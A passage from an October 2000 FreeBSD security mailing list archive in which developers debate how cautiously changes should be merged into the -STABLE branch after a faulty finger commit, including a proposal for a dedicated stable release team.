Our release branchs stagnate otherwise. It also causes more people to hit our .0 releases so they can get new features rather than wait for the .1 releases. Your comment however about giving time to mature in -CURRENT is on the mark. -- -- David (obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 12:34:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from dragon.nuxi.com (trang.nuxi.com [209.152.133.57]) by hub.freebsd.org (Postfix) with ESMTP id 57A5E37B503; Tue, 3 Oct 2000 12:34:03 -0700 (PDT) Received: (from obrien@localhost) by dragon.nuxi.com (8.9.3/8.9.1) id MAA03419; Tue, 3 Oct 2000 12:33:47 -0700 (PDT) (envelope-from obrien) Date: Tue, 3 Oct 2000 12:33:47 -0700 From: "David O'Brien" To: Warner Losh Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003123347.C3076@dragon.nuxi.com> Reply-To: obrien@FreeBSD.ORG References: <20001003124008.A4892@netmonger.net> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <200010031658.KAA27159@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200010031658.KAA27159@harmony.village.org>; from imp@village.org on Tue, Oct 03, 2000 at 10:58:30AM -0600 X-Operating-System: FreeBSD 5.0-CURRENT Organization: The NUXI BSD group X-Pgp-Rsa-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Rsa-Keyid: 1024/34F9F9D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 10:58:30AM -0600, Warner Losh wrote: > We used to be really good about this and as we've grown the cautious > merge into -stable ethic has become diluted. It is time to tighten > things down for a while again. The finger thing has shown that the > current practices are too loose. And the only way to return to this is to put peer presure on committers who MFC too quick. -- -- David (obrien@FreeBSD.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 13: 7:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 2CECF37B66C for ; Tue, 3 Oct 2000 13:07:47 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 0CAA51C77; Tue, 3 Oct 2000 16:07:46 -0400 (EDT) Date: Tue, 3 Oct 2000 16:07:46 -0400 From: Bill Fumerola To: Chris Wasser Cc: freebsd-security@FreeBSD.ORG Subject: Re: politeness Message-ID: <20001003160745.A38472@jade.chc-chimes.com> References: <50494.970597386@critter> <20001003125025.A81873@area51.v-wave.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001003125025.A81873@area51.v-wave.com>; from cwasser@v-wave.com on Tue, Oct 03, 2000 at 12:50:25PM -0600 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 12:50:25PM -0600, Chris Wasser wrote: > Sometime we are forced to work with people we may not get along > with, this is how life works. It surprises me that the core team > would degrade into a school-yard fight over the actions of one > person, isn't this what happened to NetBSD/OpenBSD? Are we headed > along that road now? The OpenBSD/NetBSD split occured because someone with content and clue had a disagreement. Luckily, bitching and whining will never magically generate code, so I wouldn't worry. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 13:25:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from elvis.mu.org (elvis.mu.org [207.154.226.10]) by hub.freebsd.org (Postfix) with ESMTP id BCB5937B502 for ; Tue, 3 Oct 2000 13:25:34 -0700 (PDT) Received: by elvis.mu.org (Postfix, from userid 1088) id 65D062B270; Tue, 3 Oct 2000 15:25:34 -0500 (CDT) Date: Tue, 3 Oct 2000 15:25:34 -0500 From: Dave McKay To: Bill Fumerola Cc: Chris Wasser , freebsd-security@FreeBSD.ORG Subject: Re: politeness Message-ID: <20001003152534.A38230@elvis.mu.org> References: <50494.970597386@critter> <20001003125025.A81873@area51.v-wave.com> <20001003160745.A38472@jade.chc-chimes.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001003160745.A38472@jade.chc-chimes.com>; from billf@chimesnet.com on Tue, Oct 03, 2000 at 04:07:46PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Fumerola (billf@chimesnet.com) wrote: > The OpenBSD/NetBSD split occured because someone with content and > clue had a disagreement. Luckily, bitching and whining will never > magically generate code, so I wouldn't worry. Let me be the first invite Brett to create BrettBSD and fix all of those nasty FreeBSD bugs he hates so much. -- Dave McKay Network Engineer - Google Inc. dave@mu.org - dave@google.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 13:30:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 11D5F37B66C; Tue, 3 Oct 2000 13:30:21 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 7A5EC1C77; Tue, 3 Oct 2000 16:30:20 -0400 (EDT) Date: Tue, 3 Oct 2000 16:30:20 -0400 From: Bill Fumerola To: Brett Glass Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c] Message-ID: <20001003163020.B38472@jade.chc-chimes.com> References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <200010031800.MAA27859@harmony.village.org> <4.3.2.7.2.20001003125150.04c7f3f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <4.3.2.7.2.20001003125150.04c7f3f0@localhost>; from brett@lariat.org on Tue, Oct 03, 2000 at 12:59:54PM -0600 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 12:59:54PM -0600, Brett Glass wrote: > I'd be glad to help. As someone in a similar position (I *cannot* adopt > a branch for use on production servers before the .2 release), I've always > been a strong advocate of keeping -STABLE patched against newly discovered > problems. Why does the version number matter? If we released a new version every two weeks, would 4.2 still be production ready for you? What if 4.1.1 was called 4.2? Would you run it? People(not just Brett) need to look at features and benefits when deciding what version to run, not some magical number that gets incremented every now and then. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 13:54:24 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 7FEB537B673; Tue, 3 Oct 2000 13:54:10 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e93KrpX83062; Tue, 3 Oct 2000 13:53:52 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Christopher Masto Cc: Warner Losh , Paul Richards , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: When to merge to stable [Re: cvs commit: src/usr.bin/finger finger.c] In-Reply-To: Message from Christopher Masto of "Tue, 03 Oct 2000 12:40:08 EDT." <20001003124008.A4892@netmonger.net> Date: Tue, 03 Oct 2000 13:53:51 -0700 Message-ID: <83058.970606431@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I think it's important to push _some_ features into stable. Having to > wait several years for the next major "point-oh" release of FreeBSD > (which comes with "point-oh fear" holding it back) is not the best > way to do things. IMO. There's a place between these two extremes > of paranoia and wild abandon, and I think that's where the MFCs should > take place. Which is essentially what the committer's guide tries to say. I have to agree with Christopher here - there's no hard-and-fast rule about merging which will result in 100% success at effectively balancing user-desired features with appropriate caution, except perhaps "BE CAREFUL!" We've made mistakes at both extremes of the spectrum in the past and, being frail humans, will probably make them in the future. If I had 3 wishes and could ask for anything I wanted, my first wish would be that were more "hands" involved with -stable and fewer public statements from various committers, as often seen in the past, disclaiming any interest in working with -stable or saying that it's too much trouble to keep up with anything but -current. That has a demoralizing effect on the people who DO value and work with -stable and sends the wrong message to our user base as well. We can't very well say that users should avoid -current out of one side of our mouthes and then say we don't do development in anything but -current out of the other side. We've also historically tried to be nice about this and not brow-beat our volunteer developers into having to go back and looking at "old code", leading to a situation where at least 95% of committers work in -current and some mysterious cadre of other folks handle the job of actually getting stuff back into -stable. I even often attempted to do that by myself until the diffs routinely got up into the 50MB range and I realized (and publically proclaimed) that that was way too much diffage to look at and the process was getting dangerously error prone as a result. People have since gotten a lot better about attending to -stable, don't think I haven't noticed that, but I think we still have a ways to go when it comes to the general committer perspective on it. Perhaps it's time to consider some changes to our policies on -stable? - Jordan P.S. No, I'm not going to tell you what my other two wishes would be. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 13:58:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id C95FE37B503; Tue, 3 Oct 2000 13:58:39 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e93KwYM11572; Tue, 3 Oct 2000 14:58:34 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id OAA29843; Tue, 3 Oct 2000 14:58:33 -0600 (MDT) Message-Id: <200010032058.OAA29843@harmony.village.org> To: Jordan Hubbard Subject: Re: When to merge to stable [Re: cvs commit: src/usr.bin/finger finger.c] Cc: Christopher Masto , Paul Richards , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Tue, 03 Oct 2000 13:53:51 PDT." <83058.970606431@winston.osd.bsdi.com> References: <83058.970606431@winston.osd.bsdi.com> Date: Tue, 03 Oct 2000 14:58:33 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <83058.970606431@winston.osd.bsdi.com> Jordan Hubbard writes: : P.S. No, I'm not going to tell you what my other two wishes would be. :-) I'm sure at least one of them wouldn't be able to be published w/o heavy editing on a famil list such as this :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 14:18:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from winston.osd.bsdi.com (winston.osd.bsdi.com [204.216.27.229]) by hub.freebsd.org (Postfix) with ESMTP id 26D8F37B502; Tue, 3 Oct 2000 14:18:39 -0700 (PDT) Received: from winston.osd.bsdi.com (jkh@localhost [127.0.0.1]) by winston.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e93LIQX83266; Tue, 3 Oct 2000 14:18:26 -0700 (PDT) (envelope-from jkh@winston.osd.bsdi.com) To: Paul Richards Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: Message from Paul Richards of "Tue, 03 Oct 2000 18:32:28 BST." <39DA182C.C70ED553@originative.co.uk> Date: Tue, 03 Oct 2000 14:18:26 -0700 Message-ID: <83262.970607906@winston.osd.bsdi.com> From: Jordan Hubbard Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I think we should have a stable release team, that changes to the stable Again, I don't think anything more substantive is required than getting our developers to take on more "ownership" of the -stable branch and, in so doing, create a defacto "stable release team" where more eyeballs are going over the changes, more people are vetting changes and things like the finger screwup are found almost immediately because people are actually LOOKING AT THE COMMITS which go into -stable. That doesn't require any huge changes in process so much as it simply requires more buy-in to -stable by committers We're obviously never going to stop making mistakes because we're human and humans make mistakes, whether it's in writing code for FreeBSD or for the European Space Agency, but we could at least get better at CATCHING those mistakes before they actually go out in release form and for that to happen, more people need to be actively involved in the process of both writing and reading code. We don't need any additional layers of bureaucracy or special committees since those merely insulate the engineer from his true function: Coding and reviewing code. If it's now part of your full-time hattism to worry about this then I hope you'll start spending some number of hours each day in reviewing each and every change which goes into -stable. However many other people are doing this as well or what label you put on them is not so important since you may find problems that another dozen engineers just missed, nor will being a member of any special group make you any more effective at doing that. I resist the creation of such groups, in fact, because it tends to lend the often false impression that "somebody else" is handling problems and that's how stuff starts slipping through the cracks. The bulk of our developers start figuring that they can stop taking responsibility for X, Y and Z because that's clearly the responsibility of the Foo team despite the fact that the Foo team currently has 50% of its members on vacation and the other 50% are kind of burnt-out that week. Keeping -stable stable should be everyone's job, and making that an actual reality rather than just a statement would go a long ways towards preventing what just happened from happening again. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:22: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 826D837B66C for ; Tue, 3 Oct 2000 15:22:01 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id AAA96004; Wed, 4 Oct 2000 00:21:58 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: James Wyatt Cc: Michael Bryan , security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf References: From: Dag-Erling Smorgrav Date: 04 Oct 2000 00:21:57 +0200 In-Reply-To: James Wyatt's message of "Tue, 3 Oct 2000 11:25:18 -0500 (CDT)" Message-ID: Lines: 12 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt writes: > More and less. netstat -an is longer, sockstat has more columns. I like > the PID given in sockstat, but is there any way to get them for Unix > domain sockets? I tried "apropos domain" and "(for DIR in `echo $PATH | tr > ':' ' '` ; do ls $DIR 2> /dev/null | grep stat ; done) | more", but > neither gave me much help... - Jy@ Hmm, put this on my todo list. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:28:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 6126637B503; Tue, 3 Oct 2000 15:28:09 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA23309; Tue, 3 Oct 2000 16:27:47 -0600 (MDT) Message-Id: <4.3.2.7.2.20001003161654.00de6b60@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Tue, 03 Oct 2000 16:27:43 -0600 To: Bill Fumerola From: Brett Glass Subject: Re: STABLE support team [Was: cvs commit: src/usr.bin/finger finger.c] Cc: Warner Losh , Paul Richards , cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: <20001003163020.B38472@jade.chc-chimes.com> References: <4.3.2.7.2.20001003125150.04c7f3f0@localhost> <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <200010031800.MAA27859@harmony.village.org> <4.3.2.7.2.20001003125150.04c7f3f0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 02:30 PM 10/3/2000, Bill Fumerola wrote: >Why does the version number matter? If we released a new version every two weeks, >would 4.2 still be production ready for you? What if 4.1.1 was called 4.2? Would you >run it? Well, Bill, 4.1.1 was not a full release, and all of the same activities that go into a full point release were not carried on for it. There's something about a full point release that gets folks off of their, er, derrieres and gets them to finish and commit changes that they had not yet completed. As you know, the purpose of 4.1.1 was to roll cryptography into -STABLE in the wake of the expiration of the RSA patent. A good thing, of course, but there are still some glitches in 4.1.1 that I expect will be fixed by 4.2. >People(not just Brett) need to look at features and benefits when deciding >what version to run, not some magical number that gets incremented every now >and then. Believe me, we do. For the moment, I and my clients have agreed that the amount of time it takes to get to a .2 release, under the current numbering system, is usually sufficient to make a development branch of FreeBSD "seasoned" and ready for the production servers. This is an approximation and a judgment call that is by no means set in stone! In the 3.x-STABLE branch, we did NOT install 3.2 because we saw problems in it. We waited a bit longer. Many of the machines got 3.3 and even 3.4. This time, we are hoping to go with 4.2 because we're eager for the TCP/IP and VM improvements. The kernel is bigger but the RAM seems to be worth it. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:40:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.originative.co.uk (mailgate.originative.co.uk [194.217.50.228]) by hub.freebsd.org (Postfix) with ESMTP id A42BB37B66C; Tue, 3 Oct 2000 15:40:23 -0700 (PDT) Received: from originative.co.uk (lobster.originative.co.uk [194.217.50.241]) by mailgate.originative.co.uk (Postfix) with ESMTP id 6806C1D140; Tue, 3 Oct 2000 23:40:21 +0100 (BST) Message-ID: <39DA6055.594B13E4@originative.co.uk> Date: Tue, 03 Oct 2000 23:40:21 +0100 From: Paul Richards X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Jordan Hubbard Cc: Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c References: <83262.970607906@winston.osd.bsdi.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan Hubbard wrote: > > > If it's now part of your full-time hattism to worry about this then I > hope you'll start spending some number of hours each day in reviewing > each and every change which goes into -stable. However many other I think you're looking at it the wrong way around. The stable team wouldn't be putting in a lot of hours reviewing stable commits. Stable commits would only occur if the stable team did them i.e. no-one else would be allowed to commit to stable. The stable team would then monitor -current, noting commits that are bug fixes, and slating them for a MFC at a later date when it's felt they've had enough of a shakeout. Stable would stagnate to some extent, certainly more so than it presently does, but I think that's exactly what should happen to a stable branch. That's not to say that new features would never make it back to the stable branch but they would certainly do so a lot more slowly and only if there was real value to them and not just because they exist. Paul Richards FreeBSD Services Ltd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 15:56:45 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 706) id 1D31437B502; Tue, 3 Oct 2000 15:56:38 -0700 (PDT) Date: Tue, 3 Oct 2000 15:56:38 -0700 From: Jonathan Lemon To: Paul Richards Cc: Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003155638.B73409@hub.freebsd.org> References: <83262.970607906@winston.osd.bsdi.com> <39DA6055.594B13E4@originative.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <39DA6055.594B13E4@originative.co.uk>; from Paul Richards on Tue, Oct 03, 2000 at 11:40:21PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote: > > > > If it's now part of your full-time hattism to worry about this then I > > hope you'll start spending some number of hours each day in reviewing > > each and every change which goes into -stable. However many other > > I think you're looking at it the wrong way around. The stable team > wouldn't be putting in a lot of hours reviewing stable commits. Stable > commits would only occur if the stable team did them i.e. no-one else > would be allowed to commit to stable. The stable team would then monitor > -current, noting commits that are bug fixes, and slating them for a MFC > at a later date when it's felt they've had enough of a shakeout. > > Stable would stagnate to some extent, certainly more so than it > presently does, but I think that's exactly what should happen to a > stable branch. That's not to say that new features would never make it > back to the stable branch but they would certainly do so a lot more > slowly and only if there was real value to them and not just because > they exist. Uh. If only the "-stable" team were allowed to commit to -stable, then it would quickly become the -stale branch. I think that we had this at one point with 3.X, and there were lots of complaints. -stable is not (IMHO) supposed to be just bugfixes. Doing it that way would just put more pressure on the developers to shove the next release line out the door because they want new features. If you just want "bugfixes" and no new features, then may I suggest that you stick with the 3.X branch? No new development or changes go in there, but you can still pull in critical bug fixes as needed. Then when 5.0 becomes the -stable branch, you can move on to 4.x. -- Jonathan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 16:27:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D0B5F37B503; Tue, 3 Oct 2000 16:27:20 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA55442; Tue, 3 Oct 2000 16:27:20 -0700 (PDT) (envelope-from kris@FreeBSD.org) Date: Tue, 3 Oct 2000 16:27:20 -0700 From: Kris Kennaway To: Warner Losh Cc: Paul Richards , cvs-committers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/finger finger.c Message-ID: <20001003162720.D51546@freefall.freebsd.org> References: <39DA182C.C70ED553@originative.co.uk> <39D98B55.126DAFC4@originative.co.uk> <200010022227.PAA62603@freefall.freebsd.org> <39D92E08.E00CF2E4@owp.csus.edu> <20001002180303.A40584@freefall.freebsd.org> <39D98B55.126DAFC4@originative.co.uk> <200010031530.JAA26493@harmony.village.org> <20001003124008.A4892@netmonger.net> <39DA182C.C70ED553@originative.co.uk> <200010031800.MAA27859@harmony.village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010031800.MAA27859@harmony.village.org>; from imp@village.org on Tue, Oct 03, 2000 at 12:00:57PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 03, 2000 at 12:00:57PM -0600, Warner Losh wrote: > In message <39DA182C.C70ED553@originative.co.uk> Paul Richards writes: > : I think we should have a stable release team, that changes to the stable > : branch should be gated through to ensure they're thouroughly tested and > : that there's a need for them to be backported. I'd be happy to work with > : anyone else who wants to volunteer to do that since maintaining a stable > : version of the OS is a major issue for me with my new hat on. > > I'd support this strongly, both as Warner Losh, Committer and as > Warner Losh, Security Officer. My current job uses -stable and needs > to have it be sane at "all"[*] times, or we waste a lot of effort > bringing in and backing out unstable versions (we do some sanity > testing before bringing a version in, but there's only so much you can > do). I think a formal MFC process may be too stifling, unless we have a VERY responsive MFC team. Consider that we don't want the same thing to happen as did with 3.x, where 4.0-CURRENT was allowed to diverge so much that merging bugfixes became difficult. I'd settle for committers being more cautious about merging their own changes and self-managing the process better. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 16:27:38 2000 Delivered-To: freebsd-security@freebsd.org Received: from netplex.com.au (adsl-63-207-30-186.dsl.snfc21.pacbell.net [63.207.30.186]) by hub.freebsd.org (Postfix) with ESMTP id 9341E37B66C; Tue, 3 Oct 2000 16:27:21 -0700 (PDT) Received: from netplex.com.au (peter@localhost [127.0.0.1]) by netplex.com.au (8.11.0/8.9.3) with ESMTP id e93NQ7H17213; Tue, 3 Oct 2000 16:26:07 -0700 (PDT) (envelope-from peter@netplex.com.au) Message-Id: <200010032326.e93NQ7H17213@netplex.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: Jonathan Lemon Cc: Paul Richards , Jordan Hubbard , Christopher Masto , Warner Losh , Kris Kennaway , Joseph Scott , Brian Somers , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: <20001003155638.B73409@hub.freebsd.org> Date: Tue, 03 Oct 2000 16:26:07 -0700 From: Peter Wemm Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jonathan Lemon wrote: > On Tue, Oct 03, 2000 at 11:40:21PM +0100, Paul Richards wrote: > > > > > > If it's now part of your full-time hattism to worry about this then I > > > hope you'll start spending some number of hours each day in reviewing > > > each and every change which goes into -stable. However many other > > > > I think you're looking at it the wrong way around. The stable team > > wouldn't be putting in a lot of hours reviewing stable commits. Stable > > commits would only occur if the stable team did them i.e. no-one else > > would be allowed to commit to stable. The stable team would then monitor > > -current, noting commits that are bug fixes, and slating them for a MFC > > at a later date when it's felt they've had enough of a shakeout. > > > > Stable would stagnate to some extent, certainly more so than it > > presently does, but I think that's exactly what should happen to a > > stable branch. That's not to say that new features would never make it > > back to the stable branch but they would certainly do so a lot more > > slowly and only if there was real value to them and not just because > > they exist. > > Uh. If only the "-stable" team were allowed to commit to -stable, > then it would quickly become the -stale branch. I think that we had > this at one point with 3.X, and there were lots of complaints. Yes, this is what happened with 3.x and it was a disaster. We must not let this happen again. > -stable is not (IMHO) supposed to be just bugfixes. Doing it that way > would just put more pressure on the developers to shove the next release > line out the door because they want new features. Yes. > If you just want "bugfixes" and no new features, then may I suggest that > you stick with the 3.X branch? No new development or changes go in there, > but you can still pull in critical bug fixes as needed. Then when 5.0 > becomes the -stable branch, you can move on to 4.x. > -- > Jonathan > Cheers, -Peter -- Peter Wemm - peter@FreeBSD.org; peter@yahoo-inc.com; peter@netplex.com.au "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 3 16:33: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from netplex.com.au (adsl-63-207-30-186.dsl.snfc21.pacbell.net [63.207.30.186]) by hub.freebsd.org (Postfix) with ESMTP id A774237B66D; Tue, 3 Oct 2000 16:32:59 -0700 (PDT) Received: from netplex.com.au (peter@localhost [127.0.0.1]) by netplex.com.au (8.11.0/8.9.3) with ESMTP id e93NWwH17285; Tue, 3 Oct 2000 16:32:58 -0700 (PDT) (envelope-from peter@netplex.com.au) Message-Id: <200010032332.e93NWwH17285@netplex.com.au> X-Mailer: exmh version 2.1.1 10/15/1999 To: obrien@FreeBSD.org Cc: Warner Losh , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org, freebsd-security@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/finger finger.c In-Reply-To: <20001003123347.C3076@dragon.nuxi.com> Date: Tue, 03 Oct 2000 16:32:58 -0700 From: Peter Wemm Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "David O'Brien" wrote: > On Tue, Oct 03, 2000 at 10:58:30AM -0600, Warner Losh wrote: > > We used to be really good about this and as we've grown the cautious > > merge into -stable ethic has become diluted. It is time to tighten > > things down for a while again. The finger thing has shown that the > > current practices are too loose. > > And the only way to return to this is to put peer presure on committers > who MFC too quick. I know I am guilty of this sometimes, but yes. More care and patience is IMHO the best solution. Things that have potential remote access exposure could probably have stronger requirements. (again IMHO). Cheers, -Peter -- Peter Wemm - 